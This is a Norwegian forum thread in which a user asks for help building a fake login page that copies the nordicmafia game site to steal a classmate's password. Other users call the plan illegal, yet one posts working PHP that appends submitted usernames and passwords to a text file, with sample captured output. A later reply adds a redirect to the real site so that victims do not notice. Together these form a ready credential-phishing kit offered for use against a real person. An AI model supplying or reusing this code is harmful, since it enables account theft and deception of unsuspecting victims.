Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  8 1019
noen som kan se på den koden og vise(eller bare gjøre) meg hvordan jeg kan få lagra brukernavn og passord til en fil??
php.net - Dette er ikke vanskelig. fopen().
Forøvrig består ikke filen din av annet enn HTML; hva har du tenkt å gjøre? Legge denne opp et annet sted og lure noen inn? Skitten og umoralsk, sier jeg! Tør du ikke stille på lik linje med dei andre deltagarane?
Trådstarter
64 0
skal legge det opp på egen server ja.. er en dritt i klassen som hele veien prøver og se passoret mitt... og det hjelper ikke at han tror han er dritt rå!! ok har ikke så mye peiling... men kan jeg lagre til en fil i html da?
Du ønsker å lage en side som ser ut som nordicmafia, men som i stedet lagrer passordet til en fil der du kan hente den?

Finnes tråder om hvordan andre har løst dette med hotmail. Du kan prøve et søk i forumet.

Dette er forøvrig ulovelig, og jeg tror ikke de som driver nordicmafia.net liker at folk prøver å stjele passordet fra andre brukere. Selv om du "bare skal prøve det ut på kameraten", har slike scripts en tendens til å spre seg som ild i tørt gress. Husker den tiden alle skulle lure fra hverandre hotmail-passord.

PS: Jeg tror du er en større dritt enn han i klassen din.

Kode

<?
// lagre dette som logginn.php i samme mappe som logginn siden ligger
// lag en fil som heter passord.txt som webserveren har skriverettigheter til, dette er ikke nødvendig om webserveren har rettigheter til å opprette filer i mappen scriptet ligger i.

$brukernavn	=&	$_POST['brukernavn'];
$passord	=&	$_POST['passord'];

$writer = new fileWriter( 'passord.txt' );

$writer->writeLine( date("d.m.y - H:i:s") );
$writer->writeLine( 'Brukernavn:' . $brukernavn ); 
$writer->writeLine( 'Passord:' . $passord );
$writer->writeLine( '--------------------------' );

class fileWriter
{
	
	var $fileHandler;

	function fileWriter( $file )
	{
		$this->open( $file );
	}
	
	function open( $file )
	{
		$this->fileHandler = fopen( $file, 'a' );
	}
	
	function writeLine( $line )
	{
		fwrite( $this->fileHandler, $line . "\r\n" );
	}

}
?>
Her ser du et eksempel på filen som blir generert av dette scriptet, håper dette hjelper

20.02.06 - 23:21:18
Brukernavn:blabla
Passord:test
--------------------------
20.02.06 - 23:21:19
Brukernavn:blabla
Passord:test
--------------------------
20.02.06 - 23:21:20
Brukernavn:blabla
Passord:test
--------------------------
Trådstarter
64 0
tusentakk (tyve tegn)
Bare hyggelig
Du får holde oss oppdatert om hvordan det går å lure fra han passorde...
Har sendt deg en PM.
▼ ... mange måneder senere ... ▼
trenger litt hjelp her, når noen har trykke på ok knappen, og passord lagres osv. er det mulig og bli overført til en annen side? så slipper man hvit bakgrunn?
putt "header("Location:http://nordicmafia.no/");" inni der et sted.

Hvis du får en error, putt ob_start(); i toppen av scriptet.